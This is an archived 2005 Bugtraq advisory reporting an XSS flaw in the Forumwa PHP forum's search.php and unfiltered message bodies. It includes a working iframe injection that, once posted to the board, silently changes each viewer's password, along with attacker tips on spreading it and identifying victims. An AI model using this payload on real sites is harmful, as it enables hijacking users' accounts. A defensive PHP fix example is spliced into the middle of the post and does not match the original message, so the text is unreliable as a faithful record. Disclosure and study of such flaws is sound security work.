Bugtraq mailing list archives

Forumwa search.php xss vulnerability


From: Raven <raven () tgs-security com>
Date: 1 Mar 2005 00:35:21 -0000



 [][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]
 []
 [] HRG - Hackerlounge Research Group
 [] Release: HRG005
 [] Monday 03/01/05
 [] Forumwa_v1
 []
 [] The author can't be held responsible for any damage
 [] done by a reader. You have your own responsibility.
 [] Please use this document like it's meant to.
 []
 [][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]
  
 Vulnerable: Forumwa_v1 (any version)  
  
 
 ---  
  
 General information:  
  
 Forumwa is a simple discussion forum based on PHP
 and MySQL. Besides the basic features there are
 special functions like a search function, user
 profiles, a member list, a mailer, feedback,
 multilanguage support and easy installation.
  
  
 ---  
  
 Description:  
  
 The search.php script is vulnerable to an XSS attack
 by a remote attacker. The searched string is not
 filtered for harmful characters like < > and ".
 This makes it possible for an attacker to trick a
 user into visiting a harmful page and steal the
 user's session.

 Also, the body and the subject of a message posted
 on the forum are not checked for < or > characters.
 Combined, these two vulnerabilities make a serious
 problem.
  
  
 ---  
  
 Proof Of Concept:  
  
 What this proof of concept does is load a 1x1px
 IFrame from a message on the board that abuses
 the search.php XSS to change a viewer's
 password to "wh00ters". How to use: make a post
 containing the following body and hope someone
 actually views the messages on the board. Once they
 open the link to view the post, their account is
 yours. Tip: make it a nice thread that people will
 reply to so you know who you compromised.
  
 ---PoC Injection---  
  
 <iframe SRC=http://[HOST URL CHANGEME!!!]/[FORUM DIRECTORY CHANGEME!!!]/search.php?keyword=%3C/title%3E%3Ciframe%20SRC=http://[HOST URL CHANGEME!!!]/[FORUM DIRECTORY CHANGEME!!!]/account.php?passwdu=wh00ters%26passwda=wh00ters%26emailu=u () mail com%26changelog=change%20WIDTH=0%20HEIGHT=0%3E%3C/iframe%3E%3Ctitle%3E HEIGHT=1 WIDTH=1></iframe>
  
 ---PoC Injection---  
  
 All that needs to be altered in this injection are
 the parts between [ ] that say "CHANGEME!!!".
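 The two defects described above and the fix a maintainer would apply to each, as an added PHP example that is not Forumwa's code. The function names, the page layout (the keyword is assumed to be echoed into the page <title>, as the PoC's closing </title> implies) and the account.php token check are assumptions.

```php
<?php
// Added example, not Forumwa's code: the two defects the advisory describes
// beside their fixes. Function names, page layout and the token check are
// assumptions; the keyword is assumed to be echoed into <title>.

// Vulnerable search.php: the keyword reaches the HTML unencoded, so a keyword
// containing </title><iframe ...> closes the title and injects a frame.
function render_title_vulnerable(string $keyword): string
{
    return "<title>Search results for: $keyword</title>";
}

// Fixed: encode < > " ' & so the keyword is shown as text, never parsed as markup.
function render_title_safe(string $keyword): string
{
    $safe = htmlspecialchars($keyword, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return "<title>Search results for: $safe</title>";
}

// Same rule for the subject and body of a posted message: encode first, then
// add line breaks, so the only tags in the output are the ones the forum emits.
function render_post_safe(string $subject, string $body): string
{
    $s = htmlspecialchars($subject, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    $b = nl2br(htmlspecialchars($body, ENT_QUOTES | ENT_HTML5, 'UTF-8'));
    return "<h3>$s</h3>\n<p>$b</p>";
}

// account.php side: the PoC works because a password change is accepted on a
// bare GET issued by a hidden iframe. Require POST plus a token that was stored
// in the session when the form was rendered, compared in constant time.
function password_change_allowed(string $method, array $post, array $session): bool
{
    if ($method !== 'POST' || !isset($post['csrf'], $session['csrf'])) {
        return false;
    }
    return is_string($post['csrf']) && hash_equals($session['csrf'], $post['csrf']);
}

// Constructed sample input shaped like the advisory's keyword payload.
$keyword = '</title><iframe src="http://example.invalid/x"></iframe><title>';
echo render_title_vulnerable($keyword), "\n";   // frame markup passes through
echo render_title_safe($keyword), "\n";         // every < > " is entity-encoded
echo render_post_safe('Hi <b>all</b>', "line 1\nline 2"), "\n";
$session = ['csrf' => bin2hex(random_bytes(16))];
var_dump(password_change_allowed('GET', [], $session));
var_dump(password_change_allowed('POST', ['csrf' => $session['csrf']], $session));
```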
  
  
 ---  
  
 Fix and Vendor status:  
  
Vendor has been notified; expect an official patch 
soon. 
  
 ---  
 
Greetz: 
 
All the people at hackerlounge.com, JWT, 
TGS-Security.com and JWT-Security.net. 
Specifically: 
 
Th3_R@v3n (me), Dlab, Riddick, Enjoi, Blademaster, 
Modzilla, Pingu, Jake Johnson, Afterburn, airo, 
cardiaC, chis, ComputerGeek, deep_phreeze, dudley, 
evasion, eXtacy, Mattewan, Afterburn, 
Thanatos_Starfire, Roz, Sirross, UmInAsHoE, Infinite, 
Slarty, NoUse, Snake (I hate you), Surreal (I hate 
you), -=Vanguard=-, The_IRS, puNKiey, driedice, 
Carnuss, oKiDaN, Mr.Mind, dementis, net-RIDER, 
voteforpedro, Cryptic_Override, kodaxx, 
~CreEpy~NoDquE~, Brainscan, the_exode, 
phillysteak12345, DerrtyJake, =>HeX<=, m0rk, and 
anyone else I forgot.  
 
 
--- 
 
Credit: 
 
HRG - Hackerlounge Research Group 
http://www.Hackerlounge.com 
 
  